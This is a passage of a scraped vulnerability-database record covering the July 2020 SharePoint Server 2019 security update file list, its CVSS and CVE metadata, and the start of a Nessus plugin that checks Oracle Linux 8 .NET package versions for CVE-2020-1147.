\nsts_spclientnewux0ac00e19bb36ceac5b16c783f9c57697| 16.sp-pages-sitesseeall.js| | 10059| 6-Jul-20| 11:05 \nsts_spclientnewux34bd612300838bb534ab17b955244e64| 17.sp-pages-seeall.js| | 10003| 6-Jul-20| 11:05 \nsts_spclientnewux703f83fa82314d3646b6336ccfc68c7d| 18.sp-pages-firstrun.js| | 21481| 6-Jul-20| 11:05 \nsts_spclientnewux7ba0584c61764c54362d49e256636a60| 2.herowebpart-propertypaneconfiguration.js| | 20379| 6-Jul-20| 11:05 \nsts_spclientnewux4ae937081b814e011b3a30f8781ff6a0| 2.sp-list-webpart-setup.js| | 4226| 6-Jul-20| 11:05 \nsts_spclientnewuxd27a762a6f595ea2f447ab2d8ec565da| 2.sp-pages-social.js| | 50013| 6-Jul-20| 11:05 \nsts_spclientnewuxe24fd72f1cbfb12913e16ac1df4cdcb5| 20745d7d-8581-4a6c-bf26-68279bc123fc.json| | 12654| 6-Jul-20| 11:05 \nsts_spclientnewux52b9b523aa83665cd001252b93e94ac1| 2161a1c6-db61-4731-b97c-3cdb303f7cbb.json| | 13230| 6-Jul-20| 11:05 \nsts_spclientnewuxc54eccabfa9009b899cb953abfdf678f| 23.sp-pages-planner.js| | 3542| 6-Jul-20| 11:05 \nsts_spclientnewuxf6dfe077c4098d2785be12a31e5473d2| 24.sp-pages-mobileupsellview.js| | 1782| 6-Jul-20| 11:05 \nsts_spclientnewuxf6f7df5704468d218c5f3b26fe863bd9| 243166f5-4dc3-4fe2-9df2-a7971b546a0a.json| | 6971| 6-Jul-20| 11:05 \nsts_spclientnewuxc81847f87b94153a324bd86419f281a7| 25.sp-pages-app.js| | 1875| 6-Jul-20| 11:05 \nsts_spclientnewuxffbcf313abc7966e7e6a8b536675bbe5| 275c0095-a77e-4f6d-a2a0-6a7626911518.json| | 21207| 6-Jul-20| 11:05 \nsts_spclientnewux4324d9c2f2457e23dc7ffb0d040b05b8| 28.editnavchunk.js| | 59095| 6-Jul-20| 11:05 \nsts_spclientnewux1e6815f76323c00fbafeb7b4dc9cc99e| 29.sp-pages-newpagedialog.js| | 36075| 6-Jul-20| 11:05 \nsts_spclientnewux36bc50758605996dd2de21816e72ee1b| 2ba60960-c928-4ae5-9bb2-f40c17c611b8.json| | 13174| 6-Jul-20| 11:05 \nsts_spclientnewux0ebe3b2589e383ae358631657a956c04| 2e57bdfd-b419-4536-8fc1-e0681be4c1a6.json| | 13203| 6-Jul-20| 11:05 \nsts_spclientnewux263fefdcdce7237f0c86c5e707b0cb41| 3.sp-imageeditcontrol.js| | 27070| 6-Jul-20| 11:05 \nsts_spclientnewux97cf7a0b7f088024120f36c9581e9186| 3.sp-pages-events.js| | 203036| 6-Jul-20| 11:05 \nsts_spclientnewux8031c437dabae71b5524cf06f87980ce| 31.sp-pages-pagestatusnotifier.js| | 2550| 6-Jul-20| 11:05 \nsts_spclientnewuxb86635d3446dedd3ac668ca110311406| 31e9537e-f9dc-40a4-8834-0e3b7df418bc.json| | 14677| 6-Jul-20| 11:05 \nsts_spclientnewux7d2dc45432f95b86fd103556238966cc| 32.sp-pages-newsdigest-navbar.js| | 2232| 6-Jul-20| 11:05 \nsts_spclientnewux07d34bca797f60c1a73b0d1676b500e5| 39c4c1c2-63fa-41be-8cc2-f6c0b49b253d.json| | 12263| 6-Jul-20| 11:05 \nsts_spclientnewux58e18b3d801d33325553bb31ac88885c| 4.image-gallery-light-box.js| | 6463| 6-Jul-20| 11:05 \nsts_spclientnewuxe2421af58d3d88a988faa8ba86b4adba| 4.sp-pages-sharebyemail.js| | 77679| 6-Jul-20| 11:05 \nsts_spclientnewux342db9533a3215a3913c429babe7abdc| 46698648-fcd5-41fc-9526-c7f7b2ace919.json| | 13806| 6-Jul-20| 11:05 \nsts_spclientnewux158a628d96eef5d6058dbfae15012eca| 490d7c76-1824-45b2-9de3-676421c997fa.json| | 15352| 6-Jul-20| 11:05 \nsts_spclientnewuxfc1c21929fc4bc49c3ed006279e9ffcf| 5.5.js| | 4658| 6-Jul-20| 11:05 \nsts_spclientnewuxfb61b8977a1e1fb434df06105e16277f| 5.sp-pages-navigation.js| | 19539| 6-Jul-20| 11:05 \nsts_spclientnewux4986186266f727199b59946626fb8518| 544dd15b-cf3c-441b-96da-004d5a8cea1d.json| | 13834| 6-Jul-20| 11:05 \nsts_spclientnewuxb907f5fcee962e6ea16d517b503603f4| 6410b3b6-d440-4663-8744-378976dc041e.json| | 15198| 6-Jul-20| 11:05 \nsts_spclientnewux9947ff60b8287e06021dd8602e52a729| 6676088b-e28e-4a90-b9cb-d0d0303cd2eb.json| | 14484| 6-Jul-20| 11:05 \nsts_spclientnewux87639a606cb4eff65fc640a791358fab| 71c19a43-d08c-4178-8218-4df8554c0b0e.json| | 14978| 6-Jul-20| 11:05 \nsts_spclientnewuxa2e20ea074942a4b9cd5953a7cf70276| 7f718435-ee4d-431c-bdbf-9c4ff326f46e.json| | 13553| 6-Jul-20| 11:05 \nsts_spclientnewux7b48f61cb957c98d82358746f12289b0| 8654b779-4886-46d4-8ffb-b5ed960ee986.json| | 12583| 6-Jul-20| 11:05 \nsts_spclientnewux1496efe075e30075e96a884d8a074cd1| 893a257e-9c92-49bc-8a36-2f6bb058da34.json| | 141748| 6-Jul-20| 11:05 \nsts_spclientnewuxc5a328833cf912cc5b9867a481094c28| 8c88f208-6c77-4bdb-86a0-0c47b4316588.json| | 12200| 6-Jul-20| 11:05 \nsts_spclientnewuxa7df2052c2e0346723a7875f2e78139d| 9.sp-pages-teamstab.js| | 111208| 6-Jul-20| 11:05 \nsts_spclientnewuxcace392aa7eeb0215447d8373ed109d9| 91a50c94-865f-4f5c-8b4e-e49659e69772.json| | 15541| 6-Jul-20| 11:05 \nsts_spclientnewux0682b2fe8e8e6f7cccca4db9a0c29990| 9d7e898c-f1bb-473a-9ace-8b415036578b.json| | 13841| 6-Jul-20| 11:05 \nsts_spclientnewux0fdddb1f7d99376230fe4d4bb49759c8| a5df8fdf-b508-4b66-98a6-d83bc2597f63.json| | 12061| 6-Jul-20| 11:05 \nsts_spclientnewuxcf9063f036a2e975629266aaa103d655| af8be689-990e-492a-81f7-ba3e4cd3ed9c.json| | 15397| 6-Jul-20| 11:05 \nsts_spclientnewuxd98a7a0da89134c14b2cda056449e632| b19b3b9e-8d13-4fec-a93c-401a091c0707.json| | 15301| 6-Jul-20| 11:05 \nsts_spclientnewux79892d83bd937bf01186bd091972e9a1| b7dd04e1-19ce-4b24-9132-b60a1c2b910d.json| | 23126| 6-Jul-20| 11:05 \nsts_spclientnewuxf5e9c8e2184df5b63ca16f1319fa7960| c4bd7b2f-7b6e-4599-8485-16504575f590.json| | 15854| 6-Jul-20| 11:05 \nsts_spclientnewux7e3c7f016142a2f71b28f9d75fc43958| c70391ea-0b10-4ee9-b2b4-006d3fcad0cd.json| | 14970| 6-Jul-20| 11:05 \nsts_spclientnewux408dd0ffcb6b1d88eceefc32163a8518| cbe7b0a9-3504-44dd-a3a3-0e5cacd07788.json| | 14195| 6-Jul-20| 11:05 \nsts_spclientnewuxe04b7ba5c57d6efdd1b3f023a9afd70f| d1d91016-032f-456d-98a4-721247c305e8.json| | 12829| 6-Jul-20| 11:05 \nsts_spclientnewuxe0de0464927d19518f48aaff08ed2ad1| daf0b71c-6de8-4ef7-b511-faae7c388708.json| | 17481| 6-Jul-20| 11:05 \nsts_spclientnewuxa08a88a1a20d60fc6fa9f6eecf78666e| embed-webpart-base.js| | 47158| 6-Jul-20| 11:05 \nsts_spclientnewux1248484f0eaf072567b2270eb74e2a1f| listview-host-assembly.js| | 724423| 6-Jul-20| 11:05 \nsts_spclientnewuxa8c9aa3afb3e1858c4883c80b87b0886| sp-application-base.js| | 88591| 6-Jul-20| 11:05 \nsts_spclientnewux26dacaeae91404692b5c89ca58e6ef98| sp-bing-map-webpart-bundle.js| | 74178| 6-Jul-20| 11:05 \nsts_spclientnewuxa61f5e0f461e05cce0e0c856fdaae280| sp-blogs-webpart-bundle.js| | 138518| 6-Jul-20| 11:05 \nsts_spclientnewuxf5d396401fea052502b6aae89b8cc207| sp-canvas.js| | 304924| 6-Jul-20| 11:05 \nsts_spclientnewuxacbcfd1635aafc26d7fa34d3a4170557| sp-carousel-layout.js| | 74660| 6-Jul-20| 11:05 \nsts_spclientnewux22d4383e576bd2d0767efe61a9b0177f| sp-classic-page-assembly.js| | 1527232| 6-Jul-20| 11:05 \nsts_spclientnewux687ed0916c9953c4eb72b0f5cd6905e1| sp-compactcard-layout.js| | 26189| 6-Jul-20| 11:05 \nsts_spclientnewux3fd286c73a51e55671b2cf05ad879fe4| sp-component-layouts.js| | 192659| 6-Jul-20| 11:05 \nsts_spclientnewux6d0b88b1fc07d52bfd5ed0e7ffd2ff96| sp-component-utilities.js| | 106924| 6-Jul-20| 11:05 \nsts_spclientnewuxf9e26c8ba0232226f164fb3134158861| sp-connector-webpart.js| | 137981| 6-Jul-20| 11:05 \nsts_spclientnewuxaeab4a7dad255efb982d8cc6384a6b30| sp-contentrollup-webpart-bundle.js| | 225614| 6-Jul-20| 11:05 \nsts_spclientnewux2a2fc2a92e0cb8cd022d363ea1786ae4| sp-custommessageregion-bundle.js| | 34510| 6-Jul-20| 11:05 \nsts_spclientnewuxc80a54337999c221a2752d525a9f98ac| sp-dataproviders.js| | 95993| 6-Jul-20| 11:05 \nsts_spclientnewuxd14e8603d99cfdea0f8636f109640add| sp-datetimepicker.js| | 105535| 6-Jul-20| 11:05 \nsts_spclientnewux294ffd36afbed5a9fdb51794f4f3a730| sp-default-assembly.js| | 702283| 6-Jul-20| 11:05 \nsts_spclientnewuxe526f3106af18bfd9a893c145a68bea1| sp-divider-webpart-bundle.js| | 32150| 6-Jul-20| 11:05 \nsts_spclientnewux6c85212e5fd53659abdaac84362ead1f| sp-documentembed-webpart-bundle.js| | 97121| 6-Jul-20| 11:05 \nsts_spclientnewuxc67750e80ee512c39aae0f51156cc4c5| sp-embed-webparts-bundle.js| | 43199| 6-Jul-20| 11:05 \nsts_spclientnewux960f55d92c073ad967c1d41757c1f0a8| sp-events-webpart-bundle.js| | 71240| 6-Jul-20| 11:05 \nsts_spclientnewuxe983fe94f37bdad72135b55a29225aed| sp-forms-webpart-bundle.js| | 61656| 6-Jul-20| 11:05 \nsts_spclientnewuxf19a838e191127967cd29ae6b20ab799| sp-groupcalendar-webpart-bundle.js| | 133450| 6-Jul-20| 11:05 \nsts_spclientnewuxa591d003a7a8c3afca3c8688ad401ea0| sp-hero-webpart-bundle.js| | 128284| 6-Jul-20| 11:05 \nsts_spclientnewux772296c19fc27e1b6f18d28759f2ba5b| sp-html-embed.js| | 40476| 6-Jul-20| 11:05 \nsts_spclientnewux8f461cff81c07d944621f876e997777e| sp-image-gallery-webpart-bundle.js| | 81367| 6-Jul-20| 11:05 \nsts_spclientnewux2d92f617d4e9cc7ec385e0e500a3d7b2| sp-image-webpart-bundle.js| | 105611| 6-Jul-20| 11:05 \nsts_spclientnewux42e703f43e251f868d972f61dafd921e| sp-linkpreview-webpart-bundle.js| | 66341| 6-Jul-20| 11:05 \nsts_spclientnewux49b289bb50fa43774a9d4645eef75e88| sp-list-webpart-bundle.js| | 1030084| 6-Jul-20| 11:05 \nsts_spclientnewux6b8c7c4233559a13836ef1a691ba7023| sp-loader.js| | 147060| 6-Jul-20| 11:05 \nsts_spclientnewux383919f8fe3b958e524c8a635d1e2c2c| sp-loader-assembly.js| | 584557| 6-Jul-20| 11:05 \nsts_spclientnewuxe842d74f8bb0760b55d7f43f35d0d7a7| sp-newsfeed-webpart-bundle.js| | 136395| 6-Jul-20| 11:05 \nsts_spclientnewux11d2e484811a186abfb7f9a6c7275fd4| sp-newsreel-webpart-bundle.js| | 136387| 6-Jul-20| 11:05 \nsts_spclientnewuxe2e58fc5fb56b66cddf843e55ff5f992| sp-news-webpart-bundle.js| | 136209| 6-Jul-20| 11:05 \nsts_spclientnewuxc21a3246bdf5a3aa770903ed6fd493ee| sp-pages.js| | 492554| 6-Jul-20| 11:05 \nsts_spclientnewuxb3b4f7cd0e237860f1b8fdbe1372826e| sp-pages-assembly.js| | 2557278| 6-Jul-20| 11:05 \nsts_spclientnewuxb7c159038749343c1c4b0ec9f2deec4c| sp-pages-core.js| | 59295| 6-Jul-20| 11:05 \nsts_spclientnewuxb3342cfbf53938dec6fdf773f6adeebc| sp-people-webparts-bundle.js| | 163875| 6-Jul-20| 11:05 \nsts_spclientnewuxb501aed454e9ea1b719ba92103130738| sp-planner-webpart-bundle.js| | 3143147| 6-Jul-20| 11:05 \nsts_spclientnewuxea46ce84a74da087564f5d905acd4e56| sp-powerapps-webpart.js| | 24084| 6-Jul-20| 11:05 \nsts_spclientnewux22fad59d46fcfec7745b173cc20fd92d| sp-queryfilter.js| | 141726| 6-Jul-20| 11:05 \nsts_spclientnewuxec0d18f646f918f9cae4bd08ccdc09ab| sp-quickchart-webpart-bundle.js| | 255118| 6-Jul-20| 11:05 \nsts_spclientnewux0bbc1a9825e04eb5a37f62f2a09d2dbf| sp-quick-links-webpart.js| | 95055| 6-Jul-20| 11:05 \nsts_spclientnewux113384fd2f31fde205b8bf2f79ccdcd3| sp-siteactivity-webpart-bundle.js| | 194689| 6-Jul-20| 11:05 \nsts_spclientnewux2f7f2f92075f659c5926320cfab3f096| sp-sitepicker.js| | 44819| 6-Jul-20| 11:05 \nsts_spclientnewux6c3d8d275dd7351021418bffbebe3d8c| sp-spacer-webpart-bundle.js| | 44319| 6-Jul-20| 11:05 \nsts_spclientnewuxf5437647b691243399470c6a80d66804| sp-title-region-webpart.js| | 129204| 6-Jul-20| 11:05 \nsts_spclientnewuxb200a6283a80b8a6b4ee220419563723| sp-toolbox.js| | 31030| 6-Jul-20| 11:05 \nsts_spclientnewux3436740e82f30185ab432f7dbe7eed84| sp-twitter-webpart-bundle.js| | 44259| 6-Jul-20| 11:05 \nsts_spclientnewux084c8b925815606929921fa578f05539| sp-webpart-application-assembly.js| | 1522271| 6-Jul-20| 11:05 \nsts_spclientnewuxf9d542f5e7a1ffba716f8cf63efa490b| sp-webpart-base.js| | 106452| 6-Jul-20| 11:05 \nsts_spclientnewux1113dc0b40c4f62ba0b2c0cbbc272713| sp-webpart-shared.js| | 151404| 6-Jul-20| 11:05 \nsts_spclientnewuxf6f4d7aff6b346521ef692276ec4c4c6| sp-webpart-workbench.js| | 51898| 6-Jul-20| 11:05 \nsts_spclientnewux96fbeacb80b41e044617bbe3fade4c6c| sp-webpart-workbench-assembly.js| | 1916972| 6-Jul-20| 11:05 \nsts_spclientnewuxb936577a0b035ab65bc7e49bd5e6a9ab| sp-yammerembed-webpart-bundle.js| | 144166| 6-Jul-20| 11:05 \nsts_spclientnewux80dae808de3b5078b4efc4fb29865793| e377ea37-9047-43b9-8cdb-a761be2f8e09.json| | 13427| 6-Jul-20| 11:05 \nsts_spclientnewuxab7b1df6c15b0a294a30492e9ac8fae1| eb95c819-ab8f-4689-bd03-0c2d65d47b1f.json| | 14590| 6-Jul-20| 11:05 \nsts_spclientnewux8ef36081a346aba067e958bbb3d5a845| f6fdf4f8-4a24-437b-a127-32e66a5dd9b4.json| | 13416| 6-Jul-20| 11:05 \nsts_spclientnewuxcb869d957d4e64318530b63e610d75f7| f92bf067-bc19-489e-a556-7fe95f508720.json| | 18015| 6-Jul-20| 11:05 \nsts_spclientnewux2e8f0649b2b51d464fb6d12bb368a21f| spclientmanifests.json| | 842362| 6-Jul-20| 11:07 \nsts_spclientnewuxcdd2fade97e6bd1c609dafc0204d0272| office-ui-fabric-react-bundle.js| | 548871| 6-Jul-20| 11:07 \nsts_spclientnewux7ffed58434bba18019f8dc25a6921a4f| sp-a11y.js| | 18449| 6-Jul-20| 11:07 \nsts_spclientnewuxd06b22027fae659d53ac198990a2bb9a| sp-dragzone.js| | 8397| 6-Jul-20| 11:07 \nsts_spclientnewuxdce4aa0e772fc2b45853242803a8efdf| sp-flex-layout.js| | 6517| 6-Jul-20| 11:07 \nsts_spclientnewux121e8abb46c9ff351343b680014b113b| sp-hero-layout.js| | 20682| 6-Jul-20| 11:07 \nsts_spclientnewuxf915d58a5d7a11c9f0074f6a6b62e431| sp-masonry-layout.js| | 73604| 6-Jul-20| 11:07 \nsts_spclientnewuxa9691f2e24a93a05b2f0aea66ecd2b39| sp-page-context.js| | 24215| 6-Jul-20| 11:07 \nsts_spclientnewux45c199cda8c597c6b22274f4ccd6346b| tab-test-field-customizer.js| | 5718| 6-Jul-20| 11:07 \ncui.debug.js| cui.debug.js| | 657986| 7-Jul-20| 11:28 \ncui.js| cui.js| | 364466| 7-Jul-20| 11:28 \nxui.debug.js| xui.debug.js| | 45549| 7-Jul-20| 11:28 \nxui.js| xui.js| | 18954| 7-Jul-20| 11:27 \nwac.word.sword.dll| sword.dll| 16.0.10363.12107| 12659096| | \nwdsrv.conversion.sword.dll| sword.dll| 16.0.10363.12107| 12659096| 7-Jul-20| 11:30 \nwdsrv.dll| microsoft.office.word.server.dll| 16.0.10363.12107| 376232| 7-Jul-20| 11:25 \nwdsrv.isapi.dll| microsoft.office.word.server.dll| 16.0.10363.12107| 376232| 7-Jul-20| 11:25 \nmicrosoft.office.translationservices.dll| microsoft.office.translationservices.dll| 16.0.10363.12107| 417192| 7-Jul-20| 11:30 \ntranslationqueue.sql| translationqueue.sql| | 53164| 7-Jul-20| 11:30 \ncore.js| core.js| | 646739| 5-Jul-20| 09:49 \nifswfe.dll| microsoft.office.infopath.server.dll| 16.0.10363.12107| 3175328| 7-Jul-20| 11:26 \nifswfepriv.dll| microsoft.office.infopath.server.dll| 16.0.10363.12107| 3175328| 7-Jul-20| 11:26 \noffxml.dll| offxml.dll| 16.0.10363.12107| 412592| 7-Jul-20| 11:30 \n \nInformation about protection and securityProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-14T07:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Server 2019: July 14, 2020", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1025", "CVE-2020-1147", "CVE-2020-1342", "CVE-2020-1439", "CVE-2020-1443", "CVE-2020-1444", "CVE-2020-1445", "CVE-2020-1446", "CVE-2020-1447", "CVE-2020-1448", "CVE-2020-1450", "CVE-2020-1451", "CVE-2020-1454", "CVE-2020-1456"], "modified": "2020-07-14T07:00:00", "id": "KB4484453", "href": "https://support.microsoft.com/en-us/help/4484453", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-25T14:38:25", "description": "From Red Hat Security Advisory 2020:2954 :\n\nThe remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:2954 advisory.\n\n - dotnet: XML source markup processing remote code execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-20T00:00:00", "type": "nessus", "title": "Oracle Linux 8 : .NET / 3.1 / Core (ELSA-2020-2954)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2023-01-24T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:aspnetcore-runtime-3.1", "p-cpe:/a:oracle:linux:aspnetcore-targeting-pack-3.1", "p-cpe:/a:oracle:linux:dotnet", "p-cpe:/a:oracle:linux:dotnet-apphost-pack-3.1", "p-cpe:/a:oracle:linux:dotnet-host", "p-cpe:/a:oracle:linux:dotnet-hostfxr-3.1", "p-cpe:/a:oracle:linux:dotnet-runtime-3.1", "p-cpe:/a:oracle:linux:dotnet-sdk-3.1", "p-cpe:/a:oracle:linux:dotnet-targeting-pack-3.1", "p-cpe:/a:oracle:linux:dotnet-templates-3.1", "p-cpe:/a:oracle:linux:netstandard-targeting-pack-2.1", "cpe:/o:oracle:linux:8"], "id": "ORACLELINUX_ELSA-2020-2954.NASL", "href": "https://www.tenable.com/plugins/nessus/138661", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2954 and \n# Oracle Linux Security Advisory ELSA-2020-2954 respectively.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138661);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/24\");\n\n script_cve_id(\"CVE-2020-1147\");\n script_xref(name:\"RHSA\", value:\"2020:2954\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Oracle Linux 8 : .NET / 3.1 / Core (ELSA-2020-2954)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"From Red Hat Security Advisory 2020:2954 :\n\nThe remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:2954 advisory.\n\n - dotnet: XML source markup processing remote code\n execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2020-July/010135.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected .net, 3.1 and / or core packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1147\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:aspnetcore-runtime-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:aspnetcore-targeting-pack-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dotnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dotnet-apphost-pack-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dotnet-host\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dotnet-hostfxr-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dotnet-runtime-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dotnet-sdk-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dotnet-targeting-pack-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dotnet-templates-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:netstandard-targeting-pack-2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:8\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 8\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"aspnetcore-runtime-3.1-3.1.6-1.0.1.el8_2\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"aspnetcore-targeting-pack-3.1-3.1.6-1.0.1.el8_2\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"dotnet-3.1.106-1.0.1.el8_2\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"dotnet-apphost-pack-3.1-3.1.6-1.0.1.el8_2\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"dotnet-host-3.1.6-1.0.1.el8_2\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"dotnet-hostfxr-3.1-3.1.6-1.0.1.el8_2\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"dotnet-runtime-3.1-3.1.6-1.0.1.el8_2\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"dotnet-sdk-3.1-3.1.106-1.0.1.el8_2\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"dotnet-targeting-pack-3.1-3.1.6-1.0.1.el8_2\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"dotnet-templates-3.1-3.1.106-1.0.1.el8_2\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"netstandard-targeting-pack-2.1-3.1.106-1.0.1.el8_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"aspnetcore-runtime-3.1 / aspnetcore-targeting-pack-3.1 / dotnet / 